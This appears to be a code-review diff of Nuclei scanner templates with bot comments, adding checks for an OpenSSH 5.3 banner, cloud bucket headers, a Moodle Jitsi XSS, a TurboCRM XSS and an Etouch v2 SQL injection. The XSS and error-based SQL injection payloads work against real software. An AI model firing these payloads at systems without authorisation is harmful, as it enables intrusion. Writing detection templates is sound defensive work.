description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities.
reference: |
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://security-tracker.debian.org/tracker/CVE-2016-6210
- http://openwall.com/lists/oss-security/2016/08/01/2
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: word
words:
- "SSH-2.0-OpenSSH_5.3"
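Review bot: `enumeraiton` in the description is misspelled (`enumeration`), and the description states vulnerability as fact although the template only matches the version banner; distributions ship patched builds that keep the `OpenSSH_5.3` string, so say `OpenSSH 5.3 banner detected; this version line is associated with username enumeration and DoS issues, but backported fixes are not visible from the banner.`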


@ -0,0 +1,29 @@
id: aws-bucket-service
info:
name: Detect websites using AWS bucket storage
author: pdteam
severity: info
tags: aws,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(tolower(all_headers), 'x-amz-bucket')
- contains(tolower(all_headers), 'x-amz-request')
- contains(tolower(all_headers), 'x-amz-id')
- contains(tolower(all_headers), 'AmazonS3')
part: header
condition: or
- type: dsl
dsl:
- contains(tolower(all_headers), 'x-guploader-uploadid')
part: header
negative: true
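Review bot: `contains(tolower(all_headers), 'AmazonS3')` can never be true because the headers are lowercased before the comparison and the literal is mixed-case; change it to `'amazons3'` like the other three expressions. `part: header` on a dsl matcher also looks redundant, since the expressions already read `all_headers` — confirm it is honoured for `type: dsl` before keeping it.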


@ -0,0 +1,25 @@
id: google-bucket-service
info:
name: Detect websites using Google bucket storage
author: pdteam
severity: info
tags: google,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- contains(tolower(all_headers), 'x-goog-component-count')
- contains(tolower(all_headers), 'x-goog-expiration')
- contains(tolower(all_headers), 'x-goog-generation')
- contains(tolower(all_headers), 'x-goog-metageneration')
- contains(tolower(all_headers), 'x-goog-stored-content-encoding')
- contains(tolower(all_headers), 'x-goog-stored-content-length')
- contains(tolower(all_headers), 'x-guploader-uploadid')
part: header
condition: or


@ -3,7 +3,7 @@ id: basic-cors-misconfig
info:
name: Basic CORS misconfiguration
author: nadino
severity: low
severity: info
tags: cors
requests:


@ -5,13 +5,13 @@ info:
author: aceseven (digisec360)
description: Cross-site Scripting in moodle jitsi plugin
severity: medium
tags: moodle,jitsi,xss
tags: moodle,jitsi,xss,revision
reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67
requests:
- method: GET
path:
- "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
- "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
matchers-condition: and
matchers:
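Review bot: `{{Hostname}}` is substituted into an otherwise percent-encoded `avatar` value, and if it expands to `host:port` the colon stays unencoded inside that parameter — worth confirming against a target with a non-default port, or encoding the variable if the engine offers a helper for it. Adding `revision` to `tags` also means the template is skipped by default once the `.nuclei-ignore` change in this same commit lands; if that is intended, say so in the description. The `matchers` block continues past the hunk.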


@ -0,0 +1,22 @@
id: etouch-v2-sqli
info:
name: Etouch v2 SQL Injection
author: princechaddha
severity: high
tags: etouch,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "c4ca4238a0b923820dcc509a6f75849b"
part: body
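Review bot: The `info` block has no `reference:` or `description:`, unlike the other new templates in this commit, so there is nothing to check the finding against; add at least a reference to the advisory or write-up the payload came from. The matcher's hash is unexplained — a comment above the word, `# md5("1"), which the error-based payload echoes back on success`, tells a reader why that exact value is expected.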


@ -0,0 +1,30 @@
id: turbocrm-xss
info:
name: TurboCRM XSS
author: pikpikcu
severity: medium
reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
tags: xss,turbocrm
requests:
- method: GET
path:
- '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200


@ -45,4 +45,4 @@ requests:
- '"{\"msg\":\"result\",\"result\":{\"messages\"'
- '"success":true'
part: body
condition: and
condition: and


@ -14,6 +14,7 @@ workflows:
- template: cves/2016/CVE-2016-10033.yaml
- template: cves/2017/CVE-2017-1000170.yaml
- template: cves/2018/CVE-2018-3810.yaml
- template: cves/2018/CVE-2018-7422.yaml
- template: cves/2019/CVE-2019-6112.yaml
- template: cves/2019/CVE-2019-6715.yaml
- template: cves/2019/CVE-2019-9978.yaml